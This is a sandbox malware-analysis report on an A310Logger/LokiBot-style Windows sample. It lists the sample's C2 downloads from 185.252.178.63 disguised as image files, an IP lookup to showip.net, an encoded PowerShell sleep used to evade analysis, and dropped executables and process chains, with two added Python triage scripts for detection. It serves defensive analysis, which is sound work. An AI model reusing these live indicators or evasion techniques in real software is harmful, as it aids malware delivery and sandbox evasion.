Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openstreetmap.org/copyright
Source: unknown | DNS traffic detected: queries for: showip.net
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Project1sqlite | Host: showip.net
Source: global traffic | HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1 | Host: 185.252.178.63 | Connection: Keep-Alive
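The requests above are what trigger the "HTTP GET or POST without a user agent" and "May check the online IP address of the machine" signatures in the overview. As an added example (editor's code, not part of the Joe Sandbox report and not code from the sample), the following Python triage script parses the captured request lines, reconstructed from the rows above, and flags the three traits a detection rule would key on: a download from a bare IP address with no User-Agent header, a path dressed up as an image (.png/.bmp) served from a /loader/uploads/ directory, and a request to a public-IP echo service carrying the non-browser User-Agent "Project1sqlite" ("Project1" is the default project name of a Visual Basic 6 build, consistent with the msvbvm60.dll load recorded later in this report). The list of IP-echo hosts and the allowlist of common User-Agent prefixes are the editor's assumptions, not report data.

```python
"""Triage of captured HTTP requests from a sandbox run.

Added example, not part of the Joe Sandbox report. The request strings are
reconstructed from the report's "HTTP traffic detected" rows; the rules are
the editor's and are meant as a starting point for a proxy/IDS rule.
"""
import ipaddress
import re

# Constructed from the report rows: request line followed by its headers.
CAPTURED_REQUESTS = [
    "GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1\r\n"
    "Host: 185.252.178.63\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Project1sqlite\r\nHost: showip.net\r\n\r\n",
    "GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1\r\n"
    "Host: 185.252.178.63\r\nConnection: Keep-Alive\r\n\r\n",
]

# Assumption: services whose only purpose is to echo the caller's public IP.
# Extend from your own telemetry; only showip.net appears in this report.
IP_CHECK_HOSTS = {"showip.net", "api.ipify.org", "checkip.dyndns.org", "icanhazip.com"}

# Assumption: User-Agent prefixes we treat as ordinary client software.
COMMON_UA = re.compile(r"^(Mozilla|curl|Wget|python-requests)/")

IMAGE_EXTENSIONS = (".png", ".bmp", ".jpg", ".jpeg", ".gif", ".ico")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_bare_ip(host):
    """True when the Host header is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def triage(raw):
    """Return the ordered list of findings for one captured request."""
    _method, path, headers = parse_request(raw)
    host = headers.get("host", "").lower()
    findings = []
    if "user-agent" not in headers:
        findings.append("no_user_agent")
    elif not COMMON_UA.match(headers["user-agent"]):
        findings.append("uncommon_user_agent")
    if is_bare_ip(host):
        findings.append("bare_ip_host")
    if host in IP_CHECK_HOSTS:
        findings.append("public_ip_lookup")
    # An "image" fetched from a bare IP is the classic disguised second stage.
    if path.lower().endswith(IMAGE_EXTENSIONS) and "bare_ip_host" in findings:
        findings.append("image_named_download_from_ip")
    return findings


def triage_all(requests=CAPTURED_REQUESTS):
    """Map each request path to its findings."""
    return {parse_request(r)[1]: triage(r) for r in requests}


if __name__ == "__main__":
    for path, hits in triage_all().items():
        print(f"{path}: {', '.join(hits) or 'clean'}")
```

The same three rules, expressed as a proxy log query or a Suricata rule on `http.user_agent` and `http.host`, would have caught both the staged downloads from 185.252.178.63 and the showip.net beacon; the payload filenames change per campaign, the traits do not.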
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE | Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: BPL_1000572_007.bat.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D2F288
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D21019
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D2F945
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D2FA90
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D2FA3A
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D2F3CC
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02730040
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_027357E0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02737C50
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02730102
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_027304F0
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_0273D5E9
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_00D258C4
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_03040040
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_030457E0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_0304D5F8
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_03040102
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_030404F0
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031FF282
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031FF3CC
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031FFA3A
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031FF945
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031F1019
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_031F58C4
Source: BPL_1000572_007.bat.exe | Binary or memory string: OriginalFilename vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.479681642.0000000003A8F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000000.257250957.00000000005B4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.450440697.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.571001353.0000000009A00000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.478616339.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000000.436723511.000000000043A000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.580085124.00000000010BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe | Binary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe 3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File read: C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: BPL_1000572_007.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe "C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
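The -enc argument on the powershell.exe rows above is base64 over UTF-16LE, not UTF-8, which is why a plain base64 decode shows the payload as "S\x00t\x00a\x00r\x00t...". As an added example (editor's code, not part of the Joe Sandbox report and not code from the sample), the following Python snippet decodes it, shows that the child is nothing more than a 50-second Start-Sleep (the behaviour behind the "Contains long sleeps" and "May sleep (evasive loops)" signatures in the overview, and an easy way to outlast a sandbox's analysis window), and rebuilds the parent-to-child relationships from a subset of the "Process created" rows. PowerShell accepts any unambiguous prefix of -EncodedCommand, so the extractor matches on prefix rather than on the literal "-enc". The 30-second threshold for treating a sleep as a sandbox delay is an assumption; the process rows are copied from the report.

```python
"""Decode PowerShell -EncodedCommand arguments from a sandbox process tree.

Added example, not part of the Joe Sandbox report. PROCESS_ROWS is copied
from the report's "Process created" rows (parent image, child command line);
the decoder, the sleep check and the threshold are the editor's.
"""
import base64
import re

# Copied from the report rows above (a subset: the chain under the sample).
PROCESS_ROWS = [
    ("unknown", r'"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"'),
    (r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
     r"-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA=="),
    (r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe",
     r'"C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"'),
    (r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe",
     r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"),
    (r"C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe",
     r"C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352"),
]

# Assumption: a Start-Sleep at or above this many seconds is treated as an
# attempt to wait out an automated analysis window.
SANDBOX_DELAY_SECONDS = 30


def extract_encoded(cmdline):
    """Return the base64 argument of -e/-ec/-enc/-EncodedCommand, or None.

    powershell.exe resolves any unambiguous prefix of a switch name, so
    '-e', '-ec' and '-enc' all mean -EncodedCommand; '-ExecutionPolicy'
    does not and is skipped.
    """
    for m in re.finditer(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            return m.group(2)
    return None


def decode_encoded(b64):
    """-EncodedCommand payloads are UTF-16LE text, base64-encoded."""
    return base64.b64decode(b64).decode("utf-16-le")


def sleep_seconds(script):
    """Largest Start-Sleep delay in the script, in whole seconds (0 if none)."""
    best = 0
    for m in re.finditer(r"(?i)\bStart-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", script):
        best = max(best, int(m.group(1)))
    for m in re.finditer(r"(?i)\bStart-Sleep\s+-m(?:illiseconds)?\s+(\d+)", script):
        best = max(best, int(m.group(1)) // 1000)
    return best


def build_tree(rows=PROCESS_ROWS):
    """Map each parent image to the list of command lines it spawned."""
    tree = {}
    for parent, child in rows:
        tree.setdefault(parent, []).append(child)
    return tree


def analyse(rows=PROCESS_ROWS, threshold=SANDBOX_DELAY_SECONDS):
    """Decode every encoded PowerShell child and flag long sleeps."""
    report = []
    for parent, child in rows:
        b64 = extract_encoded(child)
        if b64 is None:
            continue
        script = decode_encoded(b64)
        delay = sleep_seconds(script)
        report.append({
            "parent": parent,
            "decoded": script,
            "sleep_seconds": delay,
            "sandbox_delay": delay >= threshold,
        })
    return report


if __name__ == "__main__":
    for parent, children in build_tree().items():
        print(parent)
        for c in children:
            print("    ->", c)
    for entry in analyse():
        print(f"decoded: {entry['decoded']!r}  sleep={entry['sleep_seconds']}s"
              f"  sandbox_delay={entry['sandbox_delay']}")
```

A 50-second sleep on its own is harmless, which is exactly why the sample outsources it to a child process: the parent keeps running, the sandbox's clock is spent on an idle PowerShell, and the dropped pdf.exe and fireless.exe stages appear only after the wait. Run the same decoder over Sysmon event 1 command lines to find the pattern in production telemetry.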
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File created: C:\Users\user\AppData\Roaming\note
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@14/16@1/2
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: BPL_1000572_007.bat.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
